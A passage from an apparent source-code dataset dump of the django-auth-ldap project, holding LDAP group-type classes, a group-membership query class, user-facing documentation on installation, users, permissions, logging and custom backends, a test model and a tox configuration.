There is no shortcut for is_member in this case, so\n it's left unimplemented.\n \"\"\"\n\n def __init__(self, member_attr, name_attr=\"cn\"):\n \"\"\"\n member_attr is the attribute on the group object that holds the list of\n member DNs.\n \"\"\"\n self.member_attr = member_attr\n\n super().__init__(name_attr)\n\n def user_groups(self, ldap_user, group_search):\n \"\"\"\n This searches for all of a user's groups from the bottom up. In other\n words, it returns the groups that the user belongs to, the groups that\n those groups belong to, etc. Circular references will be detected and\n pruned.\n \"\"\"\n group_info_map = {} # Maps group_dn to group_info of groups we've found\n member_dn_set = {ldap_user.dn} # Member DNs to search with next\n handled_dn_set = set() # Member DNs that we've already searched with\n\n while len(member_dn_set) > 0:\n group_infos = self.find_groups_with_any_member(\n member_dn_set, group_search, ldap_user.connection\n )\n new_group_info_map = {info[0]: info for info in group_infos}\n group_info_map.update(new_group_info_map)\n handled_dn_set.update(member_dn_set)\n\n # Get ready for the next iteration. To avoid cycles, we make sure\n # never to search with the same member DN twice.\n member_dn_set = set(new_group_info_map.keys()) - handled_dn_set\n\n return group_info_map.values()\n\n def find_groups_with_any_member(self, member_dn_set, group_search, connection):\n terms = [\n \"({}={})\".format(self.member_attr, self.ldap.filter.escape_filter_chars(dn))\n for dn in member_dn_set\n ]\n\n filterstr = \"(|{})\".format(\"\".join(terms))\n search = group_search.search_with_additional_term_string(filterstr)\n\n return search.execute(connection)\n\n\nclass GroupOfNamesType(MemberDNGroupType):\n \"\"\"\n An LDAPGroupType subclass that handles groups of class groupOfNames.\n \"\"\"\n\n def __init__(self, name_attr=\"cn\"):\n super().__init__(\"member\", name_attr)\n\n\nclass NestedGroupOfNamesType(NestedMemberDNGroupType):\n \"\"\"\n An LDAPGroupType subclass that handles groups of class groupOfNames with\n nested group references.\n \"\"\"\n\n def __init__(self, name_attr=\"cn\"):\n super().__init__(\"member\", name_attr)\n\n\nclass GroupOfUniqueNamesType(MemberDNGroupType):\n \"\"\"\n An LDAPGroupType subclass that handles groups of class groupOfUniqueNames.\n \"\"\"\n\n def __init__(self, name_attr=\"cn\"):\n super().__init__(\"uniqueMember\", name_attr)\n\n\nclass NestedGroupOfUniqueNamesType(NestedMemberDNGroupType):\n \"\"\"\n An LDAPGroupType subclass that handles groups of class groupOfUniqueNames\n with nested group references.\n \"\"\"\n\n def __init__(self, name_attr=\"cn\"):\n super().__init__(\"uniqueMember\", name_attr)\n\n\nclass ActiveDirectoryGroupType(MemberDNGroupType):\n \"\"\"\n An LDAPGroupType subclass that handles Active Directory groups.\n \"\"\"\n\n def __init__(self, name_attr=\"cn\"):\n super().__init__(\"member\", name_attr)\n\n\nclass NestedActiveDirectoryGroupType(NestedMemberDNGroupType):\n \"\"\"\n An LDAPGroupType subclass that handles Active Directory groups with nested\n group references.\n \"\"\"\n\n def __init__(self, name_attr=\"cn\"):\n super().__init__(\"member\", name_attr)\n\n\nclass OrganizationalRoleGroupType(MemberDNGroupType):\n \"\"\"\n An LDAPGroupType subclass that handles groups of class organizationalRole.\n \"\"\"\n\n def __init__(self, name_attr=\"cn\"):\n super().__init__(\"roleOccupant\", name_attr)\n\n\nclass NestedOrganizationalRoleGroupType(NestedMemberDNGroupType):\n \"\"\"\n An LDAPGroupType subclass that 
handles groups of class OrganizationalRoleGroupType\n with nested group references.\n \"\"\"\n\n def __init__(self, name_attr=\"cn\"):\n super().__init__(\"roleOccupant\", name_attr)\n\n\nclass LDAPGroupQuery(Node):\n \"\"\"\n Represents a compound query for group membership.\n\n This can be used to construct an arbitrarily complex group membership query\n with AND, OR, and NOT logical operators. Construct primitive queries with a\n group DN as the only argument. These queries can then be combined with the\n ``&``, ``|``, and ``~`` operators.\n\n :param str group_dn: The DN of a group to test for membership.\n\n \"\"\"\n\n # Connection types\n AND = \"AND\"\n OR = \"OR\"\n default = AND\n\n _CONNECTORS = [AND, OR]\n\n def __init__(self, *args, **kwargs):\n super().__init__(children=list(args) + list(kwargs.items()))\n\n def __and__(self, other):\n return self._combine(other, self.AND)\n\n def __or__(self, other):\n return self._combine(other, self.OR)\n\n def __invert__(self):\n obj = type(self)()\n obj.add(self, self.AND)\n obj.negate()\n\n return obj\n\n def _combine(self, other, conn):\n if not isinstance(other, LDAPGroupQuery):\n raise TypeError(other)\n if conn not in self._CONNECTORS:\n raise ValueError(conn)\n\n obj = type(self)()\n obj.connector = conn\n obj.add(self, conn)\n obj.add(other, conn)\n\n return obj\n\n def resolve(self, ldap_user, groups=None):\n if groups is None:\n groups = ldap_user._get_groups()\n\n result = self.aggregator(self._resolve_children(ldap_user, groups))\n if self.negated:\n result = not result\n\n return result\n\n @property\n def aggregator(self):\n \"\"\"\n Returns a function for aggregating a sequence of sub-results.\n \"\"\"\n if self.connector == self.AND:\n aggregator = all\n elif self.connector == self.OR:\n aggregator = any\n else:\n raise ValueError(self.connector)\n\n return aggregator\n\n def _resolve_children(self, ldap_user, groups):\n \"\"\"\n Generates the query result for each child.\n \"\"\"\n for child in self.children:\n if isinstance(child, LDAPGroupQuery):\n yield child.resolve(ldap_user, groups)\n else:\n yield groups.is_member_of(child)\n" }, { "alpha_fraction": 0.6824073791503906, "alphanum_fraction": 0.6861110925674438, "avg_line_length": 24.11627960205078, "blob_id": "76a5377331b8e09fb461f274a5cbaa113b73c7a5", "content_id": "b0f177aa30d0748e0b4d1d9d0782e0e46238a0ca", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1080, "license_type": "permissive", "max_line_length": 79, "num_lines": 43, "path": "/docs/index.rst", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "================================\nDjango Authentication Using LDAP\n================================\n\nThis is a Django authentication backend that authenticates against an LDAP\nservice. Configuration can be as simple as a single distinguished name\ntemplate, but there are many rich configuration options for working with users,\ngroups, and permissions.\n\n* Documentation: https://django-auth-ldap.readthedocs.io/\n* PyPI: https://pypi.org/project/django-auth-ldap/\n* Repository: https://github.com/django-auth-ldap/django-auth-ldap\n* License: BSD 2-Clause\n\nThis version is supported all supported version of `Python\n<https://www.python.org/downloads/>`_ and `Django\n<https://www.djangoproject.com/download/#supported-versions>`_. It requires\n`python-ldap`_ >= 3.1.\n\n.. 
toctree::\n :maxdepth: 2\n\n install\n authentication\n groups\n users\n permissions\n multiconfig\n custombehavior\n logging\n performance\n example\n reference\n changes\n contributing\n\n.. _`python-ldap`: https://pypi.org/project/python-ldap/\n\n\nLicense\n=======\n\n.. include:: ../LICENSE\n" }, { "alpha_fraction": 0.7498518228530884, "alphanum_fraction": 0.7498518228530884, "avg_line_length": 53.41935348510742, "blob_id": "20e0339fc833244b83c76af65bd3bde898ff0ceb", "content_id": "2a1d99bacc10394d28da1f946668fc5bac8fba07", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1687, "license_type": "permissive", "max_line_length": 80, "num_lines": 31, "path": "/docs/performance.rst", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "Performance\n===========\n\n:class:`~django_auth_ldap.backend.LDAPBackend` is carefully designed not to\nrequire a connection to the LDAP service for every request. Of course, this\ndepends heavily on how it is configured. If LDAP traffic or latency is a concern\nfor your deployment, this section has a few tips on minimizing it, in decreasing\norder of impact.\n\n#. **Cache groups**. If :setting:`AUTH_LDAP_FIND_GROUP_PERMS` is ``True``, the\n default behavior is to reload a user's group memberships on every request.\n This is the safest behavior, as any membership change takes effect\n immediately, but it is expensive. If possible, set\n :setting:`AUTH_LDAP_CACHE_TIMEOUT` to remove most of this traffic.\n\n#. **Don't access user.ldap_user.***. Except for ``ldap_user.dn``, these\n properties are only cached on a per-request basis. If you can propagate LDAP\n attributes to a :class:`~django.contrib.auth.models.User`, they will only be\n updated at login. ``user.ldap_user.attrs`` triggers an LDAP connection for\n every request in which it's accessed.\n\n#. **Use simpler group types**. Some grouping mechanisms are more expensive than\n others. This will often be outside your control, but it's important to note\n that the extra functionality of more complex group types like\n :class:`~django_auth_ldap.config.NestedGroupOfNamesType` is not free and will\n generally require a greater number and complexity of LDAP queries.\n\n#. **Use direct binding**. Binding with :setting:`AUTH_LDAP_USER_DN_TEMPLATE` is\n a little bit more efficient than relying on :setting:`AUTH_LDAP_USER_SEARCH`.\n Specifically, it saves two LDAP operations (one bind and one search) per\n login.\n" }, { "alpha_fraction": 0.7165305018424988, "alphanum_fraction": 0.7177875638008118, "avg_line_length": 32.8510627746582, "blob_id": "9ea8dc2b64100df062963f290cb0c96d0afa70aa", "content_id": "46169ce0d4db0823b011400a73c3880e7a6d4014", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1591, "license_type": "permissive", "max_line_length": 78, "num_lines": 47, "path": "/docs/install.rst", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "Installation\n============\n\nInstall the package with pip:\n\n.. code-block:: sh\n\n $ pip install django-auth-ldap\n\nIt requires `python-ldap`_ >= 3.0. You'll need the `OpenLDAP`_ libraries and\nheaders available on your system.\n\nTo use the auth backend in a Django project, add\n``'django_auth_ldap.backend.LDAPBackend'`` to\n:setting:`AUTHENTICATION_BACKENDS`. Do not add anything to\n:setting:`INSTALLED_APPS`.\n\n.. 
code-block:: python\n\n AUTHENTICATION_BACKENDS = [\"django_auth_ldap.backend.LDAPBackend\"]\n\n:class:`~django_auth_ldap.backend.LDAPBackend` should work with custom user\nmodels, but it does assume that a database is present.\n\n.. note::\n\n :class:`~django_auth_ldap.backend.LDAPBackend` does not inherit from\n :class:`~django.contrib.auth.backends.ModelBackend`. It is possible to use\n :class:`~django_auth_ldap.backend.LDAPBackend` exclusively by configuring\n it to draw group membership from the LDAP server. However, if you would\n like to assign permissions to individual users or add users to groups\n within Django, you'll need to have both backends installed:\n\n .. code-block:: python\n\n AUTHENTICATION_BACKENDS = [\n \"django_auth_ldap.backend.LDAPBackend\",\n \"django.contrib.auth.backends.ModelBackend\",\n ]\n\n Django will check each authentication backend in order, so you are free to\n reorder these if checking\n :class:`~django.contrib.auth.backends.ModelBackend` first is more\n applicable to your application.\n\n.. _`python-ldap`: https://pypi.org/project/python-ldap/\n.. _`OpenLDAP`: https://www.openldap.org/\n" }, { "alpha_fraction": 0.7498474717140198, "alphanum_fraction": 0.75, "avg_line_length": 44.52777862548828, "blob_id": "3c29236ec7ad165be32617fec06091d89e4d59dc", "content_id": "e56eb704b7536a88af4badd71e4a7b519455f664", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 6560, "license_type": "permissive", "max_line_length": 80, "num_lines": 144, "path": "/docs/users.rst", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "User objects\n============\n\nAuthenticating against an external source is swell, but Django's auth module is\ntightly bound to a user model. When a user logs in, we have to create a model\nobject to represent them in the database. Because the LDAP search is\ncase-insensitive, the default implementation also searches for existing Django\nusers with an iexact query and new users are created with lowercase usernames.\nSee :meth:`~django_auth_ldap.backend.LDAPBackend.get_or_build_user` if you'd\nlike to override this behavior. See\n:meth:`~django_auth_ldap.backend.LDAPBackend.get_user_model` if you'd like to\nsubstitute a proxy model.\n\nBy default, lookups on existing users are done using the user model's\n:attr:`~django.contrib.auth.models.CustomUser.USERNAME_FIELD`. To lookup by a\ndifferent field, use :setting:`AUTH_LDAP_USER_QUERY_FIELD`. When set, the\nusername field is ignored.\n\nWhen using the default for lookups, the only required field for a user is the\nusername. The default :class:`~django.contrib.auth.models.User` model can be\npicky about the characters allowed in usernames, so\n:class:`~django_auth_ldap.backend.LDAPBackend` includes a pair of hooks,\n:meth:`~django_auth_ldap.backend.LDAPBackend.ldap_to_django_username` and\n:meth:`~django_auth_ldap.backend.LDAPBackend.django_to_ldap_username`, to\ntranslate between LDAP usernames and Django usernames. You may need this, for\nexample, if your LDAP names have periods in them. You can subclass\n:class:`~django_auth_ldap.backend.LDAPBackend` to implement these hooks; by\ndefault the username is not modified. 
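\n\nAs a purely illustrative sketch (the period/underscore convention below is an assumption, not something the library prescribes), such a subclass might look like this:\n\n.. code-block:: python\n\n    from django_auth_ldap.backend import LDAPBackend\n\n\n    class CustomUsernameLDAPBackend(LDAPBackend):\n        # Assumed convention: LDAP usernames contain periods, Django usernames use underscores.\n        def ldap_to_django_username(self, username):\n            return username.replace(\".\", \"_\")\n\n        def django_to_ldap_username(self, username):\n            return username.replace(\"_\", \".\")\n\n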
:class:`~django.contrib.auth.models.User`\nobjects that are authenticated by\n:class:`~django_auth_ldap.backend.LDAPBackend` will have an ``ldap_username``\nattribute with the original (LDAP) username.\n:attr:`~django.contrib.auth.models.User.username` (or\n:meth:`~django.contrib.auth.models.AbstractBaseUser.get_username`) will, of\ncourse, be the Django username.\n\n.. note::\n\n Users created by :class:`~django_auth_ldap.backend.LDAPBackend` will have an\n unusable password set. This will only happen when the user is created, so if\n you set a valid password in Django, the user will be able to log in through\n :class:`~django.contrib.auth.backends.ModelBackend` (if configured) even if\n they are rejected by LDAP. This is not generally recommended, but could be\n useful as a fail-safe for selected users in case the LDAP server is\n unavailable.\n\n\nPopulating Users\n----------------\n\nYou can perform arbitrary population of your user models by adding listeners to\nthe :mod:`Django signal <django:django.dispatch>`:\n:data:`django_auth_ldap.backend.populate_user`. This signal is sent after the\nuser object has been constructed (but not necessarily saved) and any configured\nattribute mapping has been applied (see below). You can use this to propagate\ninformation from the LDAP directory to the user object any way you like. If you\nneed the user object to exist in the database at this point, you can save it in\nyour signal handler or override\n:meth:`~django_auth_ldap.backend.LDAPBackend.get_or_build_user`. In either case,\nthe user instance will be saved automatically after the signal handlers are run.\n\nIf you need an attribute that isn't included by default in the LDAP search\nresults, see :setting:`AUTH_LDAP_USER_ATTRLIST`.\n\n\nEasy Attributes\n---------------\n\nIf you just want to copy a few attribute values directly from the user's LDAP\ndirectory entry to their Django user, the setting,\n:setting:`AUTH_LDAP_USER_ATTR_MAP`, makes it easy. This is a dictionary that\nmaps user model keys, respectively, to (case-insensitive) LDAP attribute\nnames:\n\n.. code-block:: python\n\n AUTH_LDAP_USER_ATTR_MAP = {\"first_name\": \"givenName\", \"last_name\": \"sn\"}\n\nOnly string fields can be mapped to attributes. Boolean fields can be defined by\ngroup membership:\n\n.. code-block:: python\n\n AUTH_LDAP_USER_FLAGS_BY_GROUP = {\n \"is_active\": \"cn=active,ou=groups,dc=example,dc=com\",\n \"is_staff\": (\n LDAPGroupQuery(\"cn=staff,ou=groups,dc=example,dc=com\")\n | LDAPGroupQuery(\"cn=admin,ou=groups,dc=example,dc=com\")\n ),\n \"is_superuser\": \"cn=superuser,ou=groups,dc=example,dc=com\",\n }\n\nValues in this dictionary may be simple DNs (as strings), lists or tuples of\nDNs, or :class:`~django_auth_ldap.config.LDAPGroupQuery` instances. Lists are\nconverted to queries joined by ``|``.\n\nRemember that if these settings don't do quite what you want, you can always use\nthe signals described in the previous section to implement your own logic.\n\n\nUpdating Users\n--------------\n\nBy default, all mapped user fields will be updated each time the user logs in.\nTo disable this, set :setting:`AUTH_LDAP_ALWAYS_UPDATE_USER` to ``False``. 
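\n\nWhen the attribute map alone is not enough, the :data:`django_auth_ldap.backend.populate_user` signal described above under Populating Users is the usual hook. A hedged sketch follows; the ``employeeNumber`` LDAP attribute and the ``employee_number`` user field are assumptions for illustration only:\n\n.. code-block:: python\n\n    from django.dispatch import receiver\n\n    from django_auth_ldap.backend import populate_user\n\n\n    @receiver(populate_user)\n    def copy_employee_number(sender, user=None, ldap_user=None, **kwargs):\n        # ldap_user.attrs maps attribute names to lists of string values.\n        values = ldap_user.attrs.get(\"employeeNumber\", [])\n        if values:\n            user.employee_number = values[0]  # assumes a custom user model field\n\n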
If\nyou need to populate a user outside of the authentication process—for example,\nto create associated model objects before the user logs in for the first\ntime—you can call :meth:`django_auth_ldap.backend.LDAPBackend.populate_user`.\nYou'll need an instance of :class:`~django_auth_ldap.backend.LDAPBackend`, which\nyou should feel free to create yourself.\n:meth:`~django_auth_ldap.backend.LDAPBackend.populate_user` returns the\n:class:`~django.contrib.auth.models.User` or `None` if the user could not be\nfound in LDAP.\n\n.. code-block:: python\n\n from django_auth_ldap.backend import LDAPBackend\n\n user = LDAPBackend().populate_user(\"alice\")\n if user is None:\n raise Exception(\"No user named alice\")\n\n\n.. _ldap_user:\n\nDirect Attribute Access\n-----------------------\n\nIf you need to access multi-value attributes or there is some other reason that\nthe above is inadequate, you can also access the user's raw LDAP attributes.\n``user.ldap_user`` is an object with four public properties. The group\nproperties are, of course, only valid if groups are configured.\n\n * ``dn``: The user's distinguished name.\n * ``attrs``: The user's LDAP attributes as a dictionary of lists of string\n values. The dictionaries are modified to use case-insensitive keys.\n * ``group_dns``: The set of groups that this user belongs to, as DNs.\n * ``group_names``: The set of groups that this user belongs to, as simple\n names. These are the names that will be used if\n :setting:`AUTH_LDAP_MIRROR_GROUPS` is used.\n\nPython-ldap returns all attribute values as utf8-encoded strings. For\nconvenience, this module will try to decode all values into Unicode strings. Any\nstring that can not be successfully decoded will be left as-is; this may apply\nto binary values such as Active Directory's objectSid.\n" }, { "alpha_fraction": 0.6833046674728394, "alphanum_fraction": 0.6867470145225525, "avg_line_length": 24.2608699798584, "blob_id": "f9f060333ee79315cc26d52f663b4fe825b8c04e", "content_id": "61e8351022a302ceabb66f7a720fd5c6c13d483d", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 581, "license_type": "permissive", "max_line_length": 76, "num_lines": 23, "path": "/tests/models.py", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "from django.contrib.auth.models import AbstractBaseUser\nfrom django.db import models\n\n\nclass TestUser(AbstractBaseUser):\n identifier = models.CharField(max_length=40, unique=True, db_index=True)\n uid_number = models.IntegerField()\n\n USERNAME_FIELD = \"identifier\"\n\n def get_full_name(self):\n return self.identifier\n\n def get_short_name(self):\n return self.identifier\n\n def get_first_name(self):\n return \"Alice\"\n\n def set_first_name(self, value):\n raise Exception(\"Oops...\")\n\n first_name = property(get_first_name, set_first_name)\n" }, { "alpha_fraction": 0.6651017069816589, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 36.588233947753906, "blob_id": "c0cb2dbfa94ca64d6fea75e7fc32b6df3caef5c9", "content_id": "2bfdc86da2bb59e3884026c710b89828c26ec6c4", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 639, "license_type": "permissive", "max_line_length": 85, "num_lines": 17, "path": "/docs/logging.rst", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "Logging\n=======\n\n:class:`~django_auth_ldap.backend.LDAPBackend` uses the 
standard Python\n:mod:`logging` module to log debug and warning messages to the logger named\n``'django_auth_ldap'``. If you need debug messages to help with configuration\nissues, you should add a handler to this logger. Using Django's\n:setting:`LOGGING` setting, you can add an entry to your config.\n\n.. code-block:: python\n\n LOGGING = {\n \"version\": 1,\n \"disable_existing_loggers\": False,\n \"handlers\": {\"console\": {\"class\": \"logging.StreamHandler\"}},\n \"loggers\": {\"django_auth_ldap\": {\"level\": \"DEBUG\", \"handlers\": [\"console\"]}},\n }\n" }, { "alpha_fraction": 0.7781726121902466, "alphanum_fraction": 0.779187798500061, "avg_line_length": 47.64197540283203, "blob_id": "d8c405f75783f3398b04e1526bc1e4d50272e16e", "content_id": "989a0acb350de2c0d34d075e807efaa6999135e3", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3940, "license_type": "permissive", "max_line_length": 80, "num_lines": 81, "path": "/docs/permissions.rst", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "Permissions\n===========\n\nGroups are useful for more than just populating the user's ``is_*`` fields.\n:class:`~django_auth_ldap.backend.LDAPBackend` would not be complete without\nsome way to turn a user's LDAP group memberships into Django model permissions.\nIn fact, there are two ways to do this.\n\nUltimately, both mechanisms need some way to map LDAP groups to Django groups.\nImplementations of :class:`~django_auth_ldap.config.LDAPGroupType` will have an\nalgorithm for deriving the Django group name from the LDAP group. Clients that\nneed to modify this behavior can subclass the\n:class:`~django_auth_ldap.config.LDAPGroupType` class. All of the built-in\nimplementations take a ``name_attr`` argument to ``__init__``, which\nspecifies the LDAP attribute from which to take the Django group name. By\ndefault, the ``cn`` attribute is used.\n\n\nUsing Groups Directly\n---------------------\n\nThe least invasive way to map group permissions is to set\n:setting:`AUTH_LDAP_FIND_GROUP_PERMS` to ``True``.\n:class:`~django_auth_ldap.backend.LDAPBackend` will then find all of the LDAP\ngroups that a user belongs to, map them to Django groups, and load the\npermissions for those groups. You will need to create the Django groups and\nassociate permissions yourself, generally through the admin interface.\n\nTo minimize traffic to the LDAP server,\n:class:`~django_auth_ldap.backend.LDAPBackend` can make use of Django's cache\nframework to keep a copy of a user's LDAP group memberships. To enable this\nfeature, set :setting:`AUTH_LDAP_CACHE_TIMEOUT`, which determines the timeout\nof cache entries in seconds.\n\n.. code-block:: python\n\n AUTH_LDAP_CACHE_TIMEOUT = 3600\n\n\nGroup Mirroring\n---------------\n\nThe second way to turn LDAP group memberships into permissions is to mirror the\ngroups themselves. This approach has some important disadvantages and should be\navoided if possible. For one thing, membership will only be updated when the\nuser authenticates, which may be especially inappropriate for sites with long\nsession timeouts.\n\nIf :setting:`AUTH_LDAP_MIRROR_GROUPS` is ``True``, then every time a user logs\nin, :class:`~django_auth_ldap.backend.LDAPBackend` will update the database with\nthe user's LDAP groups. Any group that doesn't exist will be created and the\nuser's Django group membership will be updated to exactly match their LDAP group\nmembership. 
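\n\nFor reference, a minimal settings sketch is shown here; the group names are placeholders rather than values the library expects:\n\n.. code-block:: python\n\n    # Mirror every LDAP group the user belongs to on each login...\n    AUTH_LDAP_MIRROR_GROUPS = True\n\n    # ...or limit mirroring to a fixed collection of group names.\n    # AUTH_LDAP_MIRROR_GROUPS = [\"staff\", \"superuser\"]\n\n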
If the LDAP server has nested groups, the Django database will end\nup with a flattened representation. For group mirroring to have any effect, you\nof course need :class:`~django.contrib.auth.backends.ModelBackend` installed as\nan authentication backend.\n\nBy default, we assume that LDAP is the sole authority on group membership; if\nyou remove a user from a group in LDAP, they will be removed from the\ncorresponding Django group the next time they log in. It is also possible to\nhave django-auth-ldap ignore some Django groups, presumably because they are\nmanaged manually or through some other mechanism. If\n:setting:`AUTH_LDAP_MIRROR_GROUPS` is a list of group names, we will manage\nthese groups and no others. If :setting:`AUTH_LDAP_MIRROR_GROUPS_EXCEPT` is a\nlist of group names, we will manage all groups except those named;\n:setting:`AUTH_LDAP_MIRROR_GROUPS` is ignored in this case.\n\n\nNon-LDAP Users\n--------------\n\n:class:`~django_auth_ldap.backend.LDAPBackend` has one more feature pertaining\nto permissions, which is the ability to handle authorization for users that it\ndid not authenticate. For example, you might be using\n:class:`~django.contrib.auth.backends.RemoteUserBackend`\nto map externally authenticated users to Django users. By setting\n:setting:`AUTH_LDAP_AUTHORIZE_ALL_USERS`,\n:class:`~django_auth_ldap.backend.LDAPBackend` will map these users to LDAP\nusers in the normal way in order to provide authorization information. Note that\nthis does *not* work with :setting:`AUTH_LDAP_MIRROR_GROUPS`; group mirroring is\na feature of authentication, not authorization.\n" }, { "alpha_fraction": 0.6348167657852173, "alphanum_fraction": 0.6753926873207092, "avg_line_length": 16.76744270324707, "blob_id": "f834f610f82602ba54d3dad3e83bcd57af6b2cd6", "content_id": "5040692272ce6056b520a3ba8a19bb4f8c25d1c1", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 764, "license_type": "permissive", "max_line_length": 70, "num_lines": 43, "path": "/tox.ini", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "[tox]\nenvlist =\n black\n flake8\n isort\n docs\n django32\n django41\n django42\n djangomain\nisolated_build = true\n\n[testenv]\ncommands = {envpython} -Wa -b -m django test --settings tests.settings\ndeps =\n django32: Django>=3.2,<4.0\n django41: Django>=4.1,<4.2\n django42: Django>=4.2,<4.3\n djangomain: https://github.com/django/django/archive/main.tar.gz\n\n[testenv:black]\ndeps = black\ncommands = black --check --diff .\nskip_install = true\n\n[testenv:flake8]\ndeps = flake8\ncommands = flake8\nskip_install = true\n\n[testenv:isort]\ndeps = isort>=5.0.1\ncommands = isort --check --diff .\nskip_install = true\n\n[testenv:docs]\nisolated_build = true\ndeps =\n readme_renderer\n sphinx\ncommands =\n make -C docs html\nallowlist_externals = make\n" }, { "alpha_fraction": 0.7271167039871216, "alphanum_fraction": 0.7351258397102356, "avg_line_length": 33.959999084472656, "blob_id": "694ecefdc4868370e0635346b2d3e50853f75724", "content_id": "e4bdfeb7cbdfbea3347524f59ec7e93c2c18265b", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1748, "license_type": "permissive", "max_line_length": 92, "num_lines": 50, "path": "/docs/multiconfig.rst", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "Multiple LDAP Configs\n=====================\n\n.. 
versionadded:: 1.1\n\nYou've probably noticed that all of the settings for this backend have the\nprefix AUTH_LDAP\\_. This is the default, but it can be customized by subclasses\nof :class:`~django_auth_ldap.backend.LDAPBackend`. The main reason you would\nwant to do this is to create two backend subclasses that reference different\ncollections of settings and thus operate independently. For example, you might\nhave two separate LDAP servers that you want to authenticate against. A short\nexample should demonstrate this:\n\n.. code-block:: python\n\n # mypackage.ldap\n\n from django_auth_ldap.backend import LDAPBackend\n\n\n class LDAPBackend1(LDAPBackend):\n settings_prefix = \"AUTH_LDAP_1_\"\n\n\n class LDAPBackend2(LDAPBackend):\n settings_prefix = \"AUTH_LDAP_2_\"\n\n\n.. code-block:: python\n\n # settings.py\n\n AUTH_LDAP_1_SERVER_URI = \"ldap://ldap1.example.com\"\n AUTH_LDAP_1_USER_DN_TEMPLATE = \"uid=%(user)s,ou=users,dc=example,dc=com\"\n\n AUTH_LDAP_2_SERVER_URI = \"ldap://ldap2.example.com\"\n AUTH_LDAP_2_USER_DN_TEMPLATE = \"uid=%(user)s,ou=users,dc=example,dc=com\"\n\n AUTHENTICATION_BACKENDS = (\"mypackage.ldap.LDAPBackend1\", \"mypackage.ldap.LDAPBackend2\")\n\nAll of the usual rules apply: Django will attempt to authenticate a user with\neach backend in turn until one of them succeeds. When a particular backend\nsuccessfully authenticates a user, that user will be linked to the backend for\nthe duration of their session.\n\n.. note::\n\n Due to its global nature, :setting:`AUTH_LDAP_GLOBAL_OPTIONS` ignores the\n settings prefix. Regardless of how many backends are installed, this setting\n is referenced once by its default name at the time we load the ldap module.\n" }, { "alpha_fraction": 0.6584834456443787, "alphanum_fraction": 0.6660067439079285, "avg_line_length": 32.67333221435547, "blob_id": "629a0d6e7e6a7a68ec4a937c31b21562d22102a9", "content_id": "daa30a4f7bb8ff97fb67702ba5582ca8a2041a38", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 5051, "license_type": "permissive", "max_line_length": 87, "num_lines": 150, "path": "/docs/custombehavior.rst", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "Custom Behavior\n===============\n\nThere are times that the default :class:`~django_auth_ldap.backend.LDAPBackend`\nbehavior may be insufficient for your needs. In those cases, you can further \ncustomize the behavior by following these general steps:\n\n\n* Create your own :class:`~django_auth_ldap.backend.LDAPBackend` subclass.\n* Use :attr:`~django_auth_ldap.backend.LDAPBackend.default_settings` to define\n any custom settings you may want to use.\n* Override :meth:`~django_auth_ldap.backend.LDAPBackend.authenticate_ldap_user` \n hook and/or any other method as needed.\n* Define additional methods and attributes as needed.\n* Access your custom settings via ``self.settings`` inside your \n :class:`~django_auth_ldap.backend.LDAPBackend` subclass.\n\n\nSubclassing LDAPBackend\n-----------------------\n\nYou can implement your own :class:`~django_auth_ldap.backend.LDAPBackend` subclass\nif you need some custom behavior. For example, you want to only allow 50 login \nattempts every 30 minutes, and those numbers may change as needed. Furthermore, \nany successful login attempt against the LDAP server must send out an SMS \nnotification, but there should be an option to limit this behavior to a \nspecific set of usernames based on a regex. 
One can accomplish that by doing \nsomething like this:\n\n.. code-block:: python\n\n # mypackage.ldap\n\n import re\n\n from django.core.cache import cache\n\n from django_auth_ldap.backend import LDAPBackend\n\n\n class CustomLDAPBackend(LDAPBackend):\n default_settings = {\n \"LOGIN_COUNTER_KEY\": \"CUSTOM_LDAP_LOGIN_ATTEMPT_COUNT\",\n \"LOGIN_ATTEMPT_LIMIT\": 50,\n \"RESET_TIME\": 30 * 60,\n \"USERNAME_REGEX\": r\"^.*$\",\n }\n\n def authenticate_ldap_user(self, ldap_user, password):\n if self.exceeded_login_attempt_limit():\n # Or you can raise a 403 if you do not want\n # to continue checking other auth backends\n print(\"Login attempts exceeded.\")\n return None\n self.increment_login_attempt_count()\n user = ldap_user.authenticate(password)\n if user and self.username_matches_regex(user.username):\n self.send_sms(user.username)\n return user\n\n @property\n def login_attempt_count(self):\n return cache.get_or_set(\n self.settings.LOGIN_COUNTER_KEY, 0, self.settings.RESET_TIME\n )\n\n def increment_login_attempt_count(self):\n try:\n cache.incr(self.settings.LOGIN_COUNTER_KEY)\n except ValueError:\n cache.set(self.settings.LOGIN_COUNTER_KEY, 1, self.settings.RESET_TIME)\n\n def exceeded_login_attempt_limit(self):\n return self.login_attempt_count >= self.settings.LOGIN_ATTEMPT_LIMIT\n\n def username_matches_regex(self, username):\n return re.match(self.settings.USERNAME_REGEX, username)\n\n def 